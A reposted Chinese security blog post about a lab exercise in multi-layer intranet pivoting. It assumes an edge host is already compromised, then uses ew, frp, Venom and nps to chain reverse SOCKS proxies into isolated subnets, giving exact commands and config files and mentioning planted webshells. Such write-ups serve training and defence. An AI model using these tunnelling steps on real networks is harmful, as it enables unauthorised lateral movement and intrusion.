实战|内网穿透之多层代理

admin 2021年10月6日02:44:22安全文章评论151 views3670字阅读12分14秒阅读模式

请点击上面 实战|内网穿透之多层代理 一键关注!

内容来源:先知社区

实战|内网穿透之多层代理


一、前言

前几天去参加省赛的时候做内网穿透这一块明显感觉不怎么熟练,平时看大部分文章都是讲的两层网络的穿透,在真实场景下,有时候是三层甚至四层,自己实践之后发现还是和两层网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp,venom进行试验。


二、环境搭建

拓扑图如下:

实战|内网穿透之多层代理

192.168.1.0/24模拟公网环境。

每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。
假设现在已经拿到边缘主机win7。(文中所指的win2012全部指左边这台)
由于环境中途崩了一次,从Venom开始ip有所变化,请见谅。


三、ew

将ew上传至边缘机器。

实战|内网穿透之多层代理

在攻击机上执行:

ew_for_Win.exe -s rcsocks -l 1080 -e 1234


实战|内网穿透之多层代理

在边缘机器上执行:

ew_for_Win.exe -s rssocks -d 192.168.1.104 -e 1234


这时候回来看攻击机,就已经成功了。

实战|内网穿透之多层代理

给浏览器设置一个代理,即可访问内网web。

实战|内网穿透之多层代理

实战|内网穿透之多层代理

经过一系列操作,我们又写入了一个shell。
同样这里需要开启蚁剑代理。

实战|内网穿透之多层代理

实战|内网穿透之多层代理

查看192.168.183.134这台主机是否出网,结果是不出网。

实战|内网穿透之多层代理

由于需要执行命令,我们得保证一级代理不能掉。所以这里我用了两个webshell工具,蚁剑和冰蝎。

蚁剑关闭代理,冰蝎开启sock5代理1080端口,冰蝎去连192.168.183.134这台不出网主机,蚁剑连接边缘机器192.168.1.110

攻击机另起一个cmd,执行命令:

ew_for_Win.exe -s lcx_listen -l 3080 -e 8888


注意这里的端口不要和刚刚1080端口重合。

不出网主机win2012执行命令:

ew_for_Win.exe -s ssocksd -l 9999


实战|内网穿透之多层代理

这里没回显是正常的,但要保证一级代理不能掉。

再通过边缘机器打通192.168.1.110:8888 和 192.168.183.134:9999 之间的通讯隧道

ew_for_Win.exe -s lcx_slave -d 192.168.1.104 -e 8888 -f 192.168.183.134 -g 9999


实战|内网穿透之多层代理

实战|内网穿透之多层代理

这里同样的浏览器再挂个代理就可以了。

实战|内网穿透之多层代理

实战|内网穿透之多层代理

再拿webshell工具去连的话就另外再挂个3080端口代理就行了。

实战|内网穿透之多层代理


四、frp

攻击机配置frps.ini文件

[common]
bind_port = 7000


边缘机器配置frpc.ini

[common]
server_addr = 192.168.1.104
server_port = 7000

[http_proxy]

type = tcp
plugin=socks5
remote_port = 6000


攻击机执行命令

frps.exe -c frps.ini


实战|内网穿透之多层代理

边缘机器执行命令

frpc.exe ‐c frpc.ini


实战|内网穿透之多层代理

浏览器挂代理访问6000端口即可

实战|内网穿透之多层代理

拿到win2012的webshell权限后,准备进一步代理到192.168.57.0/24。一级代理不要掉。

攻击机配置frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7788


实战|内网穿透之多层代理

边缘主机win7配置frps.ini

[common]
bind_addr = 192.168.183.131  
bind_port = 7799


实战|内网穿透之多层代理

同时配置win7主机上frpc.ini

[common]
server_addr = 192.168.1.104 
server_port = 7788  
[http_proxy]
type = tcp
local_ip = 192.168.183.131  
local_port = 1080   
remote_port = 1080


实战|内网穿透之多层代理

实战|内网穿透之多层代理

同样上传frp到win2012上,配置frpc.ini

[common]
server_addr = 192.168.183.131 
server_port = 7799        
[http_proxy]
type = tcp
remote_port = 1080 
plugin = socks5


实战|内网穿透之多层代理

执行frpc.exe ‐c frpc.ini,这里都是没什么回显。

设置代理1080

实战|内网穿透之多层代理

实战|内网穿透之多层代理

同样的写入shell之后webshell工具连接挂个代理就行了。

实战|内网穿透之多层代理

实战|内网穿透之多层代理


五、Venom

此时ip发生变化:

  • win7:192.168.183.138       192.168.1.109

  • win2012:192.168.183.139       192.168.57.136

  • 核心机器win2012:192.168.57.137

攻击机上执行

admin.exe -lport 9999


实战|内网穿透之多层代理

边缘主机win7上执行

agent.exe -rhost 192.168.1.104 -rport 9999


实战|内网穿透之多层代理

回到攻击机器上就已经有了连接。

实战|内网穿透之多层代理

然后执行命令,将流量代理到7777端口

goto 1
socks 7777


实战|内网穿透之多层代理

实战|内网穿透之多层代理

实战|内网穿透之多层代理

这时win2012就可以访问了

通过冰蝎走代理,将agent.exe上传至win2012。

实战|内网穿透之多层代理

在攻击机上让节点一进行监听,也就是在边缘机器win7上等待win2012连接。

实战|内网穿透之多层代理

在win2012上执行命令连接win7:

agent.exe -rhost 192.168.183.138 -rport 9998


实战|内网穿透之多层代理

这时在攻击机上使用show命令,查看节点,就可以发现已经有两个节点,选择节点2,并socks代理到本机9998端口。

实战|内网穿透之多层代理

实战|内网穿透之多层代理

实战|内网穿透之多层代理

实战|内网穿透之多层代理


六、Nps

这个工具我还是第一次用,由于有图形化界面,感觉这个工具还比较好用,不像frp要去目标机器配置文件,也比ew更加稳定。

首先去官网下载nps和npc:https://github.com/ehang-io/nps/releases

这里我都是windows64位,下载这两个就可以了。

实战|内网穿透之多层代理

直接执行nps.exe(要注意端口,被占用了就修改conf文件)

实战|内网穿透之多层代理

然后访问127.0.0.1:8080,如果是vps上起的话就访问vps:8080,默认密码admin/123。登录后点击右侧客户端,然后新增:

实战|内网穿透之多层代理

这里可填可不填,留空的话会自动生成密匙,等会拿这个密匙来让边缘主机win7连接攻击机器。

这里ID和密匙等会要用。

实战|内网穿透之多层代理

点击右侧socks代理,新增。ID为上面的id,端口填一个没有被占用的端口就好了,保存后server就配置完毕了。

实战|内网穿透之多层代理

将npc上传至边缘机器win7,并执行命令:

npc.exe -server=ip:port -vkey=服务端生成的key


这里的port默认是8024,如果修改过nps.conf中的端口就是修改过后的端口,key就是上面服务端的密钥。

实战|内网穿透之多层代理

执行后可以看到连接已经变成在线,这时候就已经代理好了。

实战|内网穿透之多层代理

浏览器挂个代理或者用Proxifier都是可以的,前面因为一直都是用的浏览器直接走代理这里还是用下Proxifier。

新增代理规则如下

实战|内网穿透之多层代理

实战|内网穿透之多层代理

做二层代理时候想了很久,翻遍全网都没有一个案例,我的想法是kali上去开一个nps服务端,然后msf添加路由,这是一种方式。

还有就是3389远程去连边缘主机win7,但是这样操作太敏感了。官方文档有如下这样的说明,但是没找到参数怎么用,这里就用3389勉强试一下,希望有懂的表哥指点。初次体验nps感觉不是很好,如果是只做一层代理还是可以。

实战|内网穿透之多层代理

经过一系列代理操作还是在win7边缘主机访问到win2012核心机器

实战|内网穿透之多层代理

七、总结

个人觉得Venom是对新手最友好的,并且多层代理还比较方便,两层三层都比较容易上手,然后就是nps,有图形化界面还是不错的。frp比较稳定,但是要配置ini文件比较麻烦。ew稳定性又差一点。总的来说就是各有所长吧,在真实环境中要根据不同的情况使用不同的方案。

实战|内网穿透之多层代理
「天億网络安全」 知识星球 一个网络安全学习的星球!星球主要分享、整理、原创编辑等网络安全相关学习资料,一个真实有料的网络安全学习平台,大家共同学习、共同进步!

知识星球定价:199元/年,(服务时间为一年,自加入日期顺延一年)。

如何加入:扫描下方二维码,扫码付费即可加入。

加入知识星球的同学,请加我微信,拉您进VIP交流群!

实战|内网穿透之多层代理

朋友都在看

▶️等保2.0丨2021 必须了解的40个问题

▶️等保2.0 三级 拓扑图+设备套餐+详解

▶️等保2.0 二级 拓扑图+设备套餐+详解

▶️等保2.0 测评  二级系统和三级系统多长时间测评一次?

▶️等保2.0系列安全计算环境之数据完整性、保密性测评

▶️等保医疗|全国二级、三乙、三甲医院信息系统安全防护设备汇总

▶️国务院:不符合网络安全要求的政务信息系统未来将不给经费

▶️等级保护、风险评估和安全测评三者的区别

▶️分保、等保、关保、密码应用对比详解

▶️汇总 | 2020年发布的最重要网络安全标准(下载)

天億网络安全

【欢迎收藏分享到朋友圈,让更多朋友了解网络安全,分享也是一种美德!】

实战|内网穿透之多层代理

↑↑↑长按图片识别二维码关註↑↑↑


欢迎扫描关注【天億网络安全】公众号,及时了解更多网络安全知识

原文始发于微信公众号(天億网络安全):实战|内网穿透之多层代理

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月6日02:44:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  实战|内网穿透之多层代理 http://cn-sec.com/archives/566445.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: